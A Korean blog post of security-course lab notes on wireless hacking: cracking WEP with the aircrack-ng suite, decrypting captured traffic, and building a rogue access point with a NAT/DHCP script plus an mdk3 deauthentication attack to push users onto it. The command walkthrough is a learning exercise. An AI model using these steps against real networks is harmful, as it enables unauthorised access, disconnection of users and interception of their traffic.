본문 바로가기

Kitri_NCS3기 보안과정/네트워크 해킹 및 보안

170420 무선 해킹

무선해킹중에서 구식 보안인 WEP를 뚫어 보겠다.

aircrack-ng 패거리를 사용해서 해보자

aircrack-ng는 wifi 네트워크 보안을 평가하는 도구모음이다.

모니터링, 공격, 테스트, 크래킹등 다양한 테스트를 지원한다. 

airmon-ng : 해당 네트워크에 대해 모니터링을 시작한다. 

airmon-ng start/stop/check(택1) networkame을 입력하면 모니터모드로 들어가게된다.

네트워크이름은 iwconfig 로 확인하자.

airmon-ng 를 실행하고 ipconfig와 iwconfig를 확인해보면 wlan0에 대한 상태와 정보가 다르게 나오는걸 확인 할 수있다.

airodump-ng : 현재 무선망에 돌아다니는 정보 실시간 모니터링 

airodump는 실시간으로 모니터링 하기때문에 Hidden SSID 나 MAC Address Filter를 공략하는 발판으로 사용되기도한다.

BSSID나 ESSID 채널의 정보가 표시 되기 때문에 공격의 기틀을 마련해준다.

airodump-ng는 패킷을 수집할수 있다. 충분한 패킷이 수집되면 aircrack-ng로 wifi의 비밀번호를 알아 낼 수 있다.


패킷을 수집하는중 


ls 로 파일을 살펴보면 패킷을 수집한 파일이 생성되어있다.

크랙을 할려면 5000개 이상의 데이터를 수집해야한다. 실습에서는 워낙 패킷이 안모여서 ... 미리 제공된 cap 파일로 크래킹을 해보자.

10000개정도의 데이터를 가진 wep.cap을 크래킹해보았다. 

aircrack-ng 파일명 

와이파이의 비밀번호를 알아냈다.

이 패킷을 수집하는동안 사용자는 무슨일을 했을까?


cap파일과 비밀번호만 있으면 wireshark를 통해 파악 할 수 있다.

airdecap-ng 를 사용해 패킷을 http와 tcp프로토콜에서 통신했던 정보로 바꿔준다. 

airdecap-ng -w hex비밀번호  파일이름

실행하고 ls로 목록을 확인해보면 

wep-dec.cap 파일이 생성되어있다.

와이어 샤크에서 확인해보자

패킷들의 통계로 어디를 자주다니는지도 볼수 있고 패킷내부에서 사용자가 이용한 정보 및 파일의 정보도 확인 할 수있을것이다. 


Rogue AP + deauthentication attack 

가짜 AP를 만들어 와이파이를 만들고 다른사람들이 기존에 이용하고있던 망을 deauthentication attack으로 끊어서 내가만든 wifi에 붙게 만드는 방법이다.

같은망에 있다면 패킷을 스니핑하기 더 쉬울것.


isc-dhcp-server 서버 생성 패키지 설치

apt-get install isc-dhcp-server



vi /etc/dhcp/dchpd.conf 수정 

위의 dhcpd 파일안에 아래의 서브넷 정보를 추가한다.

---------------------------------------------------------------------------------dchpd.conf

subnet 10.0.0.0 netmask 255.255.255.0 {

range 10.0.0.100 10.0.0.254;

option routers 10.0.0.1;

option domain-name-server 8.8.8.8, 8.8.4.4;

}



----------------------------------------------------------------------------------------scsc.sh

bash 파일로 자신의 무선망을 AP로 만드는 작업

airmon-ng start wlan0

aitmon-ng check kill

#가짜 ap 생성

airbase-ng --essid "iptimejh" wlan0mon


#nat설정

ifconfig at0 up

ifconfig at0 10.0.0.1

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

#포워딩설정

echo 1 > /proc/sys/net/ipv4/ip_forward

#dhcp서버 실행

dhcp -d -f -cf /etc/dhcp/dchpd.conf at0


bash파일을 실행시키면 내가 생성한 가짜 AP가 생기고 와이파이망이 생긴다.

핸드폰으로 생성된 AP에 붙어보았다.

클라이언트(+맥주소) 가 붙었다고 나온다.

 와이파이에 연결된 상태.

deauthentification 패킷은 와이파이에 연결된 인증을 취소하여 재연결을 유발함.

(SSID를 공격할때도 이 패킷을 보내 새로 연결할때의 패킷을 얻는등의 용도로 사용 할 수 있음.)

명령어에 채널의 정보가 필요하기때문에 airodump_ng wlan0mon으로 가짜AP의 정보를 확인, 채널 13이라는걸 알아냄

iwconfig wlan0mon channel 13 으로 AP의 채널에 접근하고

mdk3 wlan0mon d  로 deauthentification 을 날려준다.

두번더 재접속해도 계속해서 연결이 끊기는걸 확인할 수 있다.

 다른와이파이로 갈아탐.

이런식으로 가짜 AP를 생성해서 자신에게 접속유도를해서 다양한 방식으로 스니핑 및 공격이 가능할것으로 예상.


'Kitri_NCS3기 보안과정 > 네트워크 해킹 및 보안' 카테고리의 다른 글

스위칭 방식  (0) 2018.05.17
프로토콜에 대한 이해  (0) 2018.03.27
170419 DoS , DDos 공격  (0) 2017.04.20
170420 metasploit Attack  (0) 2017.04.19
170418 DNS스푸핑  (0) 2017.04.18